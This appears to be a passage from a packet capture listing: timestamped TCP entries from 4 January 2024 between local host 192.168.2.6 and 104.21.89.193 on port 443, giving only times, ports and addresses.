                                                                                    Jan 4, 2024 08:30:00.694127083 CET44349716104.21.89.193192.168.2.6
                                                                                    Jan 4, 2024 08:30:00.694180965 CET49716443192.168.2.6104.21.89.193
                                                                                    Jan 4, 2024 08:30:00.694186926 CET44349716104.21.89.193192.168.2.6
                                                                                    Jan 4, 2024 08:30:00.694196939 CET44349716104.21.89.193192.168.2.6
                                                                                    Jan 4, 2024 08:30:00.694226980 CET49716443192.168.2.6104.21.89.193
                                                                                    Jan 4, 2024 08:30:00.694293022 CET44349716104.21.89.193192.168.2.6
                                                                                    Jan 4, 2024 08:30:00.694323063 CET44349716104.21.89.193192.168.2.6
                                                                                    Jan 4, 2024 08:30:00.694336891 CET49716443192.168.2.6104.21.89.193
                                                                                    Jan 4, 2024 08:30:00.694344997 CET44349716104.21.89.193192.168.2.6
                                                                                    Jan 4, 2024 08:30:00.694358110 CET49716443192.168.2.6104.21.89.193
                                                                                    Jan 4, 2024 08:30:00.695115089 CET44349716104.21.89.193192.168.2.6
                                                                                    Jan 4, 2024 08:30:00.695163012 CET49716443192.168.2.6104.21.89.193
                                                                                    Jan 4, 2024 08:30:00.695168972 CET44349716104.21.89.193192.168.2.6
                                                                                    Jan 4, 2024 08:30:00.695204973 CET49716443192.168.2.6104.21.89.193
                                                                                    Jan 4, 2024 08:30:00.695291042 CET44349716104.21.89.193192.168.2.6
                                                                                    Jan 4, 2024 08:30:00.695338011 CET49716443192.168.2.6104.21.89.193
                                                                                    Jan 4, 2024 08:30:00.695353985 CET44349716104.21.89.193192.168.2.6
                                                                                    Jan 4, 2024 08:30:00.695396900 CET49716443192.168.2.6104.21.89.193
                                                                                    Jan 4, 2024 08:30:00.696120977 CET44349716104.21.89.193192.168.2.6
                                                                                    Jan 4, 2024 08:30:00.696175098 CET49716443192.168.2.6104.21.89.193
                                                                                    Jan 4, 2024 08:30:00.696310997 CET44349716104.21.89.193192.168.2.6
                                                                                    Jan 4, 2024 08:30:00.696357965 CET49716443192.168.2.6104.21.89.193
                                                                                    Jan 4, 2024 08:30:00.696964979 CET44349716104.21.89.193192.168.2.6
                                                                                    Jan 4, 2024 08:30:00.697016954 CET49716443192.168.2.6104.21.89.193
                                                                                    Jan 4, 2024 08:30:00.697268009 CET44349716104.21.89.193192.168.2.6
                                                                                    Jan 4, 2024 08:30:00.697319984 CET49716443192.168.2.6104.21.89.193
                                                                                    Jan 4, 2024 08:30:00.697329998 CET44349716104.21.89.193192.168.2.6
                                                                                    Jan 4, 2024 08:30:00.697365999 CET49716443192.168.2.6104.21.89.193
                                                                                    Jan 4, 2024 08:30:00.697860003 CET44349716104.21.89.193192.168.2.6
                                                                                    Jan 4, 2024 08:30:00.697909117 CET49716443192.168.2.6104.21.89.193
                                                                                    Jan 4, 2024 08:30:00.697922945 CET44349716104.21.89.193192.168.2.6
                                                                                    Jan 4, 2024 08:30:00.697973013 CET49716443192.168.2.6104.21.89.193
                                                                                    Jan 4, 2024 08:30:00.807466984 CET44349716104.21.89.193192.168.2.6
                                                                                    Jan 4, 2024 08:30:00.807549953 CET49716443192.168.2.6104.21.89.193
                                                                                    Jan 4, 2024 08:30:00.808300018 CET44349716104.21.89.193192.168.2.6
                                                                                    Jan 4, 2024 08:30:00.808362961 CET49716443192.168.2.6104.21.89.193
                                                                                    Jan 4, 2024 08:30:00.808680058 CET44349716104.21.89.193192.168.2.6
                                                                                    Jan 4, 2024 08:30:00.808746099 CET49716443192.168.2.6104.21.89.193
                                                                                    Jan 4, 2024 08:30:00.809149027 CET44349716104.21.89.193192.168.2.6
                                                                                    Jan 4, 2024 08:30:00.809205055 CET49716443192.168.2.6104.21.89.193
                                                                                    Jan 4, 2024 08:30:00.809524059 CET44349716104.21.89.193192.168.2.6
                                                                                    Jan 4, 2024 08:30:00.809576035 CET49716443192.168.2.6104.21.89.193
                                                                                    Jan 4, 2024 08:30:00.809861898 CET44349716104.21.89.193192.168.2.6
                                                                                    Jan 4, 2024 08:30:00.809916019 CET49716443192.168.2.6104.21.89.193
                                                                                    Jan 4, 2024 08:30:00.810153961 CET44349716104.21.89.193192.168.2.6
                                                                                    Jan 4, 2024 08:30:00.810201883 CET49716443192.168.2.6104.21.89.193
                                                                                    Jan 4, 2024 08:30:00.810580015 CET44349716104.21.89.193192.168.2.6
                                                                                    Jan 4, 2024 08:30:00.810630083 CET49716443192.168.2.6104.21.89.193
                                                                                    Jan 4, 2024 08:30:00.810909986 CET44349716104.21.89.193192.168.2.6
                                                                                    Jan 4, 2024 08:30:00.810964108 CET49716443192.168.2.6104.21.89.193
                                                                                    Jan 4, 2024 08:30:00.811305046 CET44349716104.21.89.193192.168.2.6
                                                                                    Jan 4, 2024 08:30:00.811355114 CET49716443192.168.2.6104.21.89.193
                                                                                    Jan 4, 2024 08:30:00.811511040 CET44349716104.21.89.193192.168.2.6
                                                                                    Jan 4, 2024 08:30:00.811562061 CET49716443192.168.2.6104.21.89.193
                                                                                    Jan 4, 2024 08:30:00.811811924 CET44349716104.21.89.193192.168.2.6
                                                                                    Jan 4, 2024 08:30:00.811866045 CET49716443192.168.2.6104.21.89.193
                                                                                    Jan 4, 2024 08:30:00.812079906 CET44349716104.21.89.193192.168.2.6
                                                                                    Jan 4, 2024 08:30:00.812128067 CET49716443192.168.2.6104.21.89.193
                                                                                    Jan 4, 2024 08:30:00.812422037 CET44349716104.21.89.193192.168.2.6
                                                                                    Jan 4, 2024 08:30:00.812474012 CET49716443192.168.2.6104.21.89.193
                                                                                    Jan 4, 2024 08:30:00.812741995 CET44349716104.21.89.193192.168.2.6
                                                                                    Jan 4, 2024 08:30:00.812792063 CET49716443192.168.2.6104.21.89.193
                                                                                    Jan 4, 2024 08:30:00.813597918 CET44349716104.21.89.193192.168.2.6
                                                                                    Jan 4, 2024 08:30:00.813647985 CET49716443192.168.2.6104.21.89.193
                                                                                    Jan 4, 2024 08:30:00.814641953 CET44349716104.21.89.193192.168.2.6
                                                                                    Jan 4, 2024 08:30:00.814696074 CET49716443192.168.2.6104.21.89.193
                                                                                    Jan 4, 2024 08:30:00.814840078 CET44349716104.21.89.193192.168.2.6
                                                                                    Jan 4, 2024 08:30:00.814892054 CET49716443192.168.2.6104.21.89.193
                                                                                    Jan 4, 2024 08:30:00.815059900 CET44349716104.21.89.193192.168.2.6
                                                                                    Jan 4, 2024 08:30:00.815109968 CET49716443192.168.2.6104.21.89.193
                                                                                    Jan 4, 2024 08:30:00.815543890 CET44349716104.21.89.193192.168.2.6
                                                                                    Jan 4, 2024 08:30:00.815598965 CET49716443192.168.2.6104.21.89.193
                                                                                    Jan 4, 2024 08:30:00.815887928 CET44349716104.21.89.193192.168.2.6
                                                                                    Jan 4, 2024 08:30:00.815937042 CET49716443192.168.2.6104.21.89.193
                                                                                    Jan 4, 2024 08:30:00.816153049 CET44349716104.21.89.193192.168.2.6
                                                                                    Jan 4, 2024 08:30:00.816205025 CET49716443192.168.2.6104.21.89.193
                                                                                    Jan 4, 2024 08:30:00.816513062 CET44349716104.21.89.193192.168.2.6
                                                                                    Jan 4, 2024 08:30:00.816560030 CET49716443192.168.2.6104.21.89.193
                                                                                    Jan 4, 2024 08:30:00.817378044 CET44349716104.21.89.193192.168.2.6
                                                                                    Jan 4, 2024 08:30:00.817429066 CET49716443192.168.2.6104.21.89.193
                                                                                    Jan 4, 2024 08:30:00.817735910 CET44349716104.21.89.193192.168.2.6
                                                                                    Jan 4, 2024 08:30:00.817791939 CET49716443192.168.2.6104.21.89.193
                                                                                    Jan 4, 2024 08:30:00.817799091 CET44349716104.21.89.193192.168.2.6
                                                                                    Jan 4, 2024 08:30:00.817811966 CET44349716104.21.89.193192.168.2.6
                                                                                    Jan 4, 2024 08:30:00.817836046 CET49716443192.168.2.6104.21.89.193
                                                                                    Jan 4, 2024 08:30:00.817873955 CET49716443192.168.2.6104.21.89.193
                                                                                    Jan 4, 2024 08:30:00.818175077 CET49716443192.168.2.6104.21.89.193
                                                                                    Jan 4, 2024 08:30:00.831530094 CET49717443192.168.2.6104.21.89.193
                                                                                    Jan 4, 2024 08:30:00.831554890 CET44349717104.21.89.193192.168.2.6
                                                                                    Jan 4, 2024 08:30:00.831628084 CET49717443192.168.2.6104.21.89.193
                                                                                    Jan 4, 2024 08:30:00.832024097 CET49717443192.168.2.6104.21.89.193
                                                                                    Jan 4, 2024 08:30:00.832036972 CET44349717104.21.89.193192.168.2.6
                                                                                    Jan 4, 2024 08:30:01.087034941 CET44349717104.21.89.193192.168.2.6
                                                                                    Jan 4, 2024 08:30:01.089018106 CET49717443192.168.2.6104.21.89.193
                                                                                    Jan 4, 2024 08:30:01.089030981 CET44349717104.21.89.193192.168.2.6
                                                                                    Jan 4, 2024 08:30:01.539438963 CET44349717104.21.89.193192.168.2.6
                                                                                    Jan 4, 2024 08:30:01.539484024 CET44349717104.21.89.193192.168.2.6
                                                                                    Jan 4, 2024 08:30:01.539515018 CET44349717104.21.89.193192.168.2.6
                                                                                    Jan 4, 2024 08:30:01.539537907 CET44349717104.21.89.193192.168.2.6
                                                                                    Jan 4, 2024 08:30:01.539560080 CET44349717104.21.89.193192.168.2.6
                                                                                    Jan 4, 2024 08:30:01.539575100 CET49717443192.168.2.6104.21.89.193
                                                                                    Jan 4, 2024 08:30:01.539587021 CET44349717104.21.89.193192.168.2.6
                                                                                    Jan 4, 2024 08:30:01.539602995 CET49717443192.168.2.6104.21.89.193
                                                                                    Jan 4, 2024 08:30:01.539644003 CET49717443192.168.2.6104.21.89.193
                                                                                    Jan 4, 2024 08:30:01.539740086 CET44349717104.21.89.193192.168.2.6
                                                                                    Jan 4, 2024 08:30:01.540011883 CET44349717104.21.89.193192.168.2.6
                                                                                    Jan 4, 2024 08:30:01.540041924 CET44349717104.21.89.193192.168.2.6
                                                                                    Jan 4, 2024 08:30:01.540060997 CET49717443192.168.2.6104.21.89.193
                                                                                    Jan 4, 2024 08:30:01.540069103 CET44349717104.21.89.193192.168.2.6
                                                                                    Jan 4, 2024 08:30:01.540112019 CET44349717104.21.89.193192.168.2.6
                                                                                    Jan 4, 2024 08:30:01.540115118 CET49717443192.168.2.6104.21.89.193
                                                                                    Jan 4, 2024 08:30:01.540123940 CET44349717104.21.89.193192.168.2.6
                                                                                    Jan 4, 2024 08:30:01.540169001 CET49717443192.168.2.6104.21.89.193
                                                                                    Jan 4, 2024 08:30:01.666158915 CET44349717104.21.89.193192.168.2.6
                                                                                    Jan 4, 2024 08:30:01.666549921 CET44349717104.21.89.193192.168.2.6
                                                                                    Jan 4, 2024 08:30:01.666579962 CET44349717104.21.89.193192.168.2.6
                                                                                    Jan 4, 2024 08:30:01.666661978 CET49717443192.168.2.6104.21.89.193
                                                                                    Jan 4, 2024 08:30:01.666676044 CET44349717104.21.89.193192.168.2.6
                                                                                    Jan 4, 2024 08:30:01.666728020 CET49717443192.168.2.6104.21.89.193
                                                                                    Jan 4, 2024 08:30:01.666763067 CET44349717104.21.89.193192.168.2.6
                                                                                    Jan 4, 2024 08:30:01.666860104 CET44349717104.21.89.193192.168.2.6
                                                                                    Jan 4, 2024 08:30:01.666887999 CET44349717104.21.89.193192.168.2.6
                                                                                    Jan 4, 2024 08:30:01.666902065 CET49717443192.168.2.6104.21.89.193
                                                                                    Jan 4, 2024 08:30:01.666910887 CET44349717104.21.89.193192.168.2.6
                                                                                    Jan 4, 2024 08:30:01.666954041 CET49717443192.168.2.6104.21.89.193
                                                                                    Jan 4, 2024 08:30:01.667078972 CET44349717104.21.89.193192.168.2.6
                                                                                    Jan 4, 2024 08:30:01.667229891 CET44349717104.21.89.193192.168.2.6
                                                                                    Jan 4, 2024 08:30:01.667264938 CET44349717104.21.89.193192.168.2.6
                                                                                    Jan 4, 2024 08:30:01.667273998 CET49717443192.168.2.6104.21.89.193
                                                                                    Jan 4, 2024 08:30:01.667280912 CET44349717104.21.89.193192.168.2.6
                                                                                    Jan 4, 2024 08:30:01.667366982 CET49717443192.168.2.6104.21.89.193
                                                                                    Jan 4, 2024 08:30:01.667382956 CET44349717104.21.89.193192.168.2.6
                                                                                    Jan 4, 2024 08:30:01.667649031 CET44349717104.21.89.193192.168.2.6
                                                                                    Jan 4, 2024 08:30:01.667678118 CET44349717104.21.89.193192.168.2.6
                                                                                    Jan 4, 2024 08:30:01.667702913 CET49717443192.168.2.6104.21.89.193
                                                                                    Jan 4, 2024 08:30:01.667712927 CET44349717104.21.89.193192.168.2.6
                                                                                    Jan 4, 2024 08:30:01.667773962 CET49717443192.168.2.6104.21.89.193
                                                                                    Jan 4, 2024 08:30:01.667779922 CET44349717104.21.89.193192.168.2.6
                                                                                    Jan 4, 2024 08:30:01.667912006 CET44349717104.21.89.193192.168.2.6
                                                                                    Jan 4, 2024 08:30:01.667965889 CET49717443192.168.2.6104.21.89.193
                                                                                    Jan 4, 2024 08:30:01.667973042 CET44349717104.21.89.193192.168.2.6
                                                                                    Jan 4, 2024 08:30:01.668004036 CET44349717104.21.89.193192.168.2.6
                                                                                    Jan 4, 2024 08:30:01.668045044 CET49717443192.168.2.6104.21.89.193
                                                                                    Jan 4, 2024 08:30:01.668051004 CET44349717104.21.89.193192.168.2.6
                                                                                    Jan 4, 2024 08:30:01.668590069 CET44349717104.21.89.193192.168.2.6
                                                                                    Jan 4, 2024 08:30:01.668661118 CET49717443192.168.2.6104.21.89.193
                                                                                    Jan 4, 2024 08:30:01.668669939 CET44349717104.21.89.193192.168.2.6
                                                                                    Jan 4, 2024 08:30:01.716974974 CET49717443192.168.2.6104.21.89.193
                                                                                    Jan 4, 2024 08:30:01.792917967 CET44349717104.21.89.193192.168.2.6
                                                                                    Jan 4, 2024 08:30:01.793076038 CET44349717104.21.89.193192.168.2.6
                                                                                    Jan 4, 2024 08:30:01.793148994 CET49717443192.168.2.6104.21.89.193
                                                                                    Jan 4, 2024 08:30:01.793162107 CET44349717104.21.89.193192.168.2.6
                                                                                    Jan 4, 2024 08:30:01.793443918 CET44349717104.21.89.193192.168.2.6
                                                                                    Jan 4, 2024 08:30:01.793493032 CET49717443192.168.2.6104.21.89.193
                                                                                    Jan 4, 2024 08:30:01.793498993 CET44349717104.21.89.193192.168.2.6
                                                                                    Jan 4, 2024 08:30:01.793570042 CET44349717104.21.89.193192.168.2.6
                                                                                    Jan 4, 2024 08:30:01.793627977 CET49717443192.168.2.6104.21.89.193
                                                                                    Jan 4, 2024 08:30:01.793633938 CET44349717104.21.89.193192.168.2.6
                                                                                    Jan 4, 2024 08:30:01.793936014 CET44349717104.21.89.193192.168.2.6
                                                                                    Jan 4, 2024 08:30:01.793991089 CET49717443192.168.2.6104.21.89.193
                                                                                    Jan 4, 2024 08:30:01.793997049 CET44349717104.21.89.193192.168.2.6
                                                                                    Jan 4, 2024 08:30:01.794034004 CET49717443192.168.2.6104.21.89.193
                                                                                    Jan 4, 2024 08:30:01.794116020 CET44349717104.21.89.193192.168.2.6
                                                                                    Jan 4, 2024 08:30:01.794219971 CET49717443192.168.2.6104.21.89.193
                                                                                    Jan 4, 2024 08:30:01.794456005 CET44349717104.21.89.193192.168.2.6
                                                                                    Jan 4, 2024 08:30:01.794522047 CET49717443192.168.2.6104.21.89.193
                                                                                    Jan 4, 2024 08:30:01.794708967 CET44349717104.21.89.193192.168.2.6
                                                                                    Jan 4, 2024 08:30:01.794764042 CET49717443192.168.2.6104.21.89.193
                                                                                    Jan 4, 2024 08:30:01.794770956 CET44349717104.21.89.193192.168.2.6
                                                                                    Jan 4, 2024 08:30:01.794841051 CET49717443192.168.2.6104.21.89.193
                                                                                    Jan 4, 2024 08:30:01.795453072 CET44349717104.21.89.193192.168.2.6
                                                                                    Jan 4, 2024 08:30:01.795510054 CET49717443192.168.2.6104.21.89.193
                                                                                    Jan 4, 2024 08:30:01.795603037 CET44349717104.21.89.193192.168.2.6
                                                                                    Jan 4, 2024 08:30:01.795645952 CET49717443192.168.2.6104.21.89.193
                                                                                    Jan 4, 2024 08:30:01.796161890 CET44349717104.21.89.193192.168.2.6
                                                                                    Jan 4, 2024 08:30:01.796247005 CET49717443192.168.2.6104.21.89.193
                                                                                    Jan 4, 2024 08:30:01.796273947 CET44349717104.21.89.193192.168.2.6
                                                                                    Jan 4, 2024 08:30:01.796331882 CET49717443192.168.2.6104.21.89.193
                                                                                    Jan 4, 2024 08:30:01.796531916 CET44349717104.21.89.193192.168.2.6
                                                                                    Jan 4, 2024 08:30:01.796592951 CET49717443192.168.2.6104.21.89.193
                                                                                    Jan 4, 2024 08:30:01.797226906 CET44349717104.21.89.193192.168.2.6
                                                                                    Jan 4, 2024 08:30:01.797296047 CET49717443192.168.2.6104.21.89.193
                                                                                    Jan 4, 2024 08:30:01.797302008 CET44349717104.21.89.193192.168.2.6
                                                                                    Jan 4, 2024 08:30:01.797416925 CET44349717104.21.89.193192.168.2.6
                                                                                    Jan 4, 2024 08:30:01.797476053 CET49717443192.168.2.6104.21.89.193
                                                                                    Jan 4, 2024 08:30:01.797482014 CET44349717104.21.89.193192.168.2.6
                                                                                    Jan 4, 2024 08:30:01.797550917 CET49717443192.168.2.6104.21.89.193
                                                                                    Jan 4, 2024 08:30:01.798053980 CET44349717104.21.89.193192.168.2.6
                                                                                    Jan 4, 2024 08:30:01.798110962 CET49717443192.168.2.6104.21.89.193
                                                                                    Jan 4, 2024 08:30:01.798352003 CET44349717104.21.89.193192.168.2.6
                                                                                    Jan 4, 2024 08:30:01.798405886 CET49717443192.168.2.6104.21.89.193
                                                                                    Jan 4, 2024 08:30:01.798420906 CET44349717104.21.89.193192.168.2.6
                                                                                    Jan 4, 2024 08:30:01.842017889 CET49717443192.168.2.6104.21.89.193
                                                                                    Jan 4, 2024 08:30:01.941416979 CET44349717104.21.89.193192.168.2.6
                                                                                    Jan 4, 2024 08:30:01.941540003 CET49717443192.168.2.6104.21.89.193
                                                                                    Jan 4, 2024 08:30:01.941704988 CET44349717104.21.89.193192.168.2.6
                                                                                    Jan 4, 2024 08:30:01.941771030 CET49717443192.168.2.6104.21.89.193
                                                                                    Jan 4, 2024 08:30:01.941890001 CET44349717104.21.89.193192.168.2.6
                                                                                    Jan 4, 2024 08:30:01.941951990 CET49717443192.168.2.6104.21.89.193
                                                                                    Jan 4, 2024 08:30:01.942037106 CET44349717104.21.89.193192.168.2.6
                                                                                    Jan 4, 2024 08:30:01.942115068 CET49717443192.168.2.6104.21.89.193
                                                                                    Jan 4, 2024 08:30:01.942924023 CET44349717104.21.89.193192.168.2.6
                                                                                    Jan 4, 2024 08:30:01.942986012 CET49717443192.168.2.6104.21.89.193
                                                                                    Jan 4, 2024 08:30:01.943015099 CET44349717104.21.89.193192.168.2.6
                                                                                    Jan 4, 2024 08:30:01.943059921 CET49717443192.168.2.6104.21.89.193
                                                                                    Jan 4, 2024 08:30:01.943821907 CET44349717104.21.89.193192.168.2.6
                                                                                    Jan 4, 2024 08:30:01.943881989 CET49717443192.168.2.6104.21.89.193
                                                                                    Jan 4, 2024 08:30:01.943965912 CET44349717104.21.89.193192.168.2.6
                                                                                    Jan 4, 2024 08:30:01.944011927 CET49717443192.168.2.6104.21.89.193
                                                                                    Jan 4, 2024 08:30:01.944600105 CET44349717104.21.89.193192.168.2.6
                                                                                    Jan 4, 2024 08:30:01.944679976 CET49717443192.168.2.6104.21.89.193
                                                                                    Jan 4, 2024 08:30:01.944808960 CET44349717104.21.89.193192.168.2.6
                                                                                    Jan 4, 2024 08:30:01.944866896 CET49717443192.168.2.6104.21.89.193
                                                                                    Jan 4, 2024 08:30:01.945720911 CET44349717104.21.89.193192.168.2.6
                                                                                    Jan 4, 2024 08:30:01.945792913 CET49717443192.168.2.6104.21.89.193
                                                                                    Jan 4, 2024 08:30:01.945822001 CET44349717104.21.89.193192.168.2.6
                                                                                    Jan 4, 2024 08:30:01.945878983 CET49717443192.168.2.6104.21.89.193
                                                                                    Jan 4, 2024 08:30:01.946753025 CET44349717104.21.89.193192.168.2.6
                                                                                    Jan 4, 2024 08:30:01.946826935 CET49717443192.168.2.6104.21.89.193
                                                                                    Jan 4, 2024 08:30:01.946909904 CET44349717104.21.89.193192.168.2.6
                                                                                    Jan 4, 2024 08:30:01.946966887 CET49717443192.168.2.6104.21.89.193
                                                                                    Jan 4, 2024 08:30:01.947354078 CET44349717104.21.89.193192.168.2.6
                                                                                    Jan 4, 2024 08:30:01.947451115 CET49717443192.168.2.6104.21.89.193
                                                                                    Jan 4, 2024 08:30:01.947606087 CET44349717104.21.89.193192.168.2.6
                                                                                    Jan 4, 2024 08:30:01.947665930 CET49717443192.168.2.6104.21.89.193
                                                                                    Jan 4, 2024 08:30:01.947762966 CET44349717104.21.89.193192.168.2.6
                                                                                    Jan 4, 2024 08:30:01.947829008 CET49717443192.168.2.6104.21.89.193
                                                                                    Jan 4, 2024 08:30:01.948585987 CET44349717104.21.89.193192.168.2.6
                                                                                    Jan 4, 2024 08:30:01.948659897 CET49717443192.168.2.6104.21.89.193
                                                                                    Jan 4, 2024 08:30:01.948748112 CET44349717104.21.89.193192.168.2.6
                                                                                    Jan 4, 2024 08:30:01.948820114 CET49717443192.168.2.6104.21.89.193
                                                                                    Jan 4, 2024 08:30:01.949352980 CET44349717104.21.89.193192.168.2.6
                                                                                    Jan 4, 2024 08:30:01.949453115 CET49717443192.168.2.6104.21.89.193
                                                                                    Jan 4, 2024 08:30:01.949737072 CET44349717104.21.89.193192.168.2.6
                                                                                    Jan 4, 2024 08:30:01.949795008 CET49717443192.168.2.6104.21.89.193
                                                                                    Jan 4, 2024 08:30:01.950437069 CET44349717104.21.89.193192.168.2.6
                                                                                    Jan 4, 2024 08:30:01.950494051 CET49717443192.168.2.6104.21.89.193
                                                                                    Jan 4, 2024 08:30:01.950678110 CET44349717104.21.89.193192.168.2.6
                                                                                    Jan 4, 2024 08:30:01.950730085 CET49717443192.168.2.6104.21.89.193
                                                                                    Jan 4, 2024 08:30:01.951291084 CET44349717104.21.89.193192.168.2.6
                                                                                    Jan 4, 2024 08:30:01.951373100 CET49717443192.168.2.6104.21.89.193
                                                                                    Jan 4, 2024 08:30:01.952681065 CET44349717104.21.89.193192.168.2.6
                                                                                    Jan 4, 2024 08:30:01.952687979 CET44349717104.21.89.193192.168.2.6
                                                                                    Jan 4, 2024 08:30:01.952711105 CET44349717104.21.89.193192.168.2.6
                                                                                    Jan 4, 2024 08:30:01.952735901 CET49717443192.168.2.6104.21.89.193
                                                                                    Jan 4, 2024 08:30:01.952758074 CET44349717104.21.89.193192.168.2.6
                                                                                    Jan 4, 2024 08:30:01.952795982 CET49717443192.168.2.6104.21.89.193
                                                                                    Jan 4, 2024 08:30:01.952795982 CET49717443192.168.2.6104.21.89.193
                                                                                    Jan 4, 2024 08:30:01.952805042 CET44349717104.21.89.193192.168.2.6
                                                                                    Jan 4, 2024 08:30:01.998229980 CET49717443192.168.2.6104.21.89.193
                                                                                    Jan 4, 2024 08:30:02.052133083 CET44349717104.21.89.193192.168.2.6
                                                                                    Jan 4, 2024 08:30:02.052247047 CET49717443192.168.2.6104.21.89.193
                                                                                    Jan 4, 2024 08:30:02.052625895 CET44349717104.21.89.193192.168.2.6
                                                                                    Jan 4, 2024 08:30:02.052700996 CET49717443192.168.2.6104.21.89.193
                                                                                    Jan 4, 2024 08:30:02.053119898 CET44349717104.21.89.193192.168.2.6
                                                                                    Jan 4, 2024 08:30:02.053195000 CET49717443192.168.2.6104.21.89.193
                                                                                    Jan 4, 2024 08:30:02.053800106 CET44349717104.21.89.193192.168.2.6
                                                                                    Jan 4, 2024 08:30:02.053848982 CET49717443192.168.2.6104.21.89.193
                                                                                    Jan 4, 2024 08:30:02.054166079 CET44349717104.21.89.193192.168.2.6
                                                                                    Jan 4, 2024 08:30:02.054214001 CET49717443192.168.2.6104.21.89.193
                                                                                    Jan 4, 2024 08:30:02.055712938 CET44349717104.21.89.193192.168.2.6
                                                                                    Jan 4, 2024 08:30:02.055807114 CET49717443192.168.2.6104.21.89.193
                                                                                    Jan 4, 2024 08:30:02.055820942 CET44349717104.21.89.193192.168.2.6
                                                                                    Jan 4, 2024 08:30:02.055890083 CET49717443192.168.2.6104.21.89.193
                                                                                    Jan 4, 2024 08:30:02.056090117 CET44349717104.21.89.193192.168.2.6
                                                                                    Jan 4, 2024 08:30:02.056138039 CET49717443192.168.2.6104.21.89.193
                                                                                    Jan 4, 2024 08:30:02.057260036 CET44349717104.21.89.193192.168.2.6
                                                                                    Jan 4, 2024 08:30:02.057291031 CET44349717104.21.89.193192.168.2.6
                                                                                    Jan 4, 2024 08:30:02.057331085 CET49717443192.168.2.6104.21.89.193
                                                                                    Jan 4, 2024 08:30:02.057343960 CET44349717104.21.89.193192.168.2.6
                                                                                    Jan 4, 2024 08:30:02.057358980 CET49717443192.168.2.6104.21.89.193
                                                                                    Jan 4, 2024 08:30:02.057967901 CET44349717104.21.89.193192.168.2.6
                                                                                    Jan 4, 2024 08:30:02.058015108 CET49717443192.168.2.6104.21.89.193
                                                                                    Jan 4, 2024 08:30:02.058034897 CET44349717104.21.89.193192.168.2.6
                                                                                    Jan 4, 2024 08:30:02.058129072 CET49717443192.168.2.6104.21.89.193
                                                                                    Jan 4, 2024 08:30:02.058571100 CET44349717104.21.89.193192.168.2.6
                                                                                    Jan 4, 2024 08:30:02.058628082 CET49717443192.168.2.6104.21.89.193
                                                                                    Jan 4, 2024 08:30:02.059849024 CET44349717104.21.89.193192.168.2.6
                                                                                    Jan 4, 2024 08:30:02.059885979 CET44349717104.21.89.193192.168.2.6
                                                                                    Jan 4, 2024 08:30:02.059910059 CET49717443192.168.2.6104.21.89.193
                                                                                    Jan 4, 2024 08:30:02.059923887 CET44349717104.21.89.193192.168.2.6
                                                                                    Jan 4, 2024 08:30:02.059947014 CET49717443192.168.2.6104.21.89.193
                                                                                    Jan 4, 2024 08:30:02.060064077 CET44349717104.21.89.193192.168.2.6
                                                                                    Jan 4, 2024 08:30:02.060108900 CET49717443192.168.2.6104.21.89.193
                                                                                    Jan 4, 2024 08:30:02.060117960 CET44349717104.21.89.193192.168.2.6
                                                                                    Jan 4, 2024 08:30:02.060909033 CET44349717104.21.89.193192.168.2.6
                                                                                    Jan 4, 2024 08:30:02.060967922 CET49717443192.168.2.6104.21.89.193
                                                                                    Jan 4, 2024 08:30:02.060976982 CET44349717104.21.89.193192.168.2.6
                                                                                    Jan 4, 2024 08:30:02.061101913 CET44349717104.21.89.193192.168.2.6
                                                                                    Jan 4, 2024 08:30:02.061137915 CET49717443192.168.2.6104.21.89.193
                                                                                    Jan 4, 2024 08:30:02.061146021 CET44349717104.21.89.193192.168.2.6
                                                                                    Jan 4, 2024 08:30:02.061203957 CET49717443192.168.2.6104.21.89.193
                                                                                    Jan 4, 2024 08:30:02.061928034 CET44349717104.21.89.193192.168.2.6
                                                                                    Jan 4, 2024 08:30:02.061992884 CET49717443192.168.2.6104.21.89.193
                                                                                    Jan 4, 2024 08:30:02.062767029 CET44349717104.21.89.193192.168.2.6
                                                                                    Jan 4, 2024 08:30:02.062839031 CET49717443192.168.2.6104.21.89.193
                                                                                    Jan 4, 2024 08:30:02.062849045 CET44349717104.21.89.193192.168.2.6
                                                                                    Jan 4, 2024 08:30:02.062868118 CET44349717104.21.89.193192.168.2.6
                                                                                    Jan 4, 2024 08:30:02.062949896 CET49717443192.168.2.6104.21.89.193
                                                                                    Jan 4, 2024 08:30:02.062957048 CET44349717104.21.89.193192.168.2.6
                                                                                    Jan 4, 2024 08:30:02.063035011 CET49717443192.168.2.6104.21.89.193
                                                                                    Jan 4, 2024 08:30:02.064655066 CET44349717104.21.89.193192.168.2.6
                                                                                    Jan 4, 2024 08:30:02.064682007 CET44349717104.21.89.193192.168.2.6
                                                                                    Jan 4, 2024 08:30:02.064717054 CET49717443192.168.2.6104.21.89.193
                                                                                    Jan 4, 2024 08:30:02.064730883 CET44349717104.21.89.193192.168.2.6
                                                                                    Jan 4, 2024 08:30:02.064744949 CET49717443192.168.2.6104.21.89.193
                                                                                    Jan 4, 2024 08:30:02.064765930 CET49717443192.168.2.6104.21.89.193
                                                                                    Jan 4, 2024 08:30:02.065469980 CET44349717104.21.89.193192.168.2.6
                                                                                    Jan 4, 2024 08:30:02.065526962 CET49717443192.168.2.6104.21.89.193
                                                                                    Jan 4, 2024 08:30:02.066771030 CET44349717104.21.89.193192.168.2.6
                                                                                    Jan 4, 2024 08:30:02.066803932 CET44349717104.21.89.193192.168.2.6
                                                                                    Jan 4, 2024 08:30:02.066844940 CET49717443192.168.2.6104.21.89.193
                                                                                    Jan 4, 2024 08:30:02.066844940 CET49717443192.168.2.6104.21.89.193
                                                                                    Jan 4, 2024 08:30:02.066853046 CET44349717104.21.89.193192.168.2.6
                                                                                    Jan 4, 2024 08:30:02.067851067 CET44349717104.21.89.193192.168.2.6
                                                                                    Jan 4, 2024 08:30:02.067878962 CET44349717104.21.89.193192.168.2.6
                                                                                    Jan 4, 2024 08:30:02.067910910 CET49717443192.168.2.6104.21.89.193
                                                                                    Jan 4, 2024 08:30:02.067919016 CET44349717104.21.89.193192.168.2.6
                                                                                    Jan 4, 2024 08:30:02.068020105 CET49717443192.168.2.6104.21.89.193
                                                                                    Jan 4, 2024 08:30:02.069637060 CET44349717104.21.89.193192.168.2.6
                                                                                    Jan 4, 2024 08:30:02.069655895 CET44349717104.21.89.193192.168.2.6
                                                                                    Jan 4, 2024 08:30:02.069725037 CET49717443192.168.2.6104.21.89.193
                                                                                    Jan 4, 2024 08:30:02.069731951 CET44349717104.21.89.193192.168.2.6
                                                                                    Jan 4, 2024 08:30:02.069806099 CET49717443192.168.2.6104.21.89.193
                                                                                    Jan 4, 2024 08:30:02.071439028 CET44349717104.21.89.193192.168.2.6
                                                                                    Jan 4, 2024 08:30:02.071455002 CET44349717104.21.89.193192.168.2.6
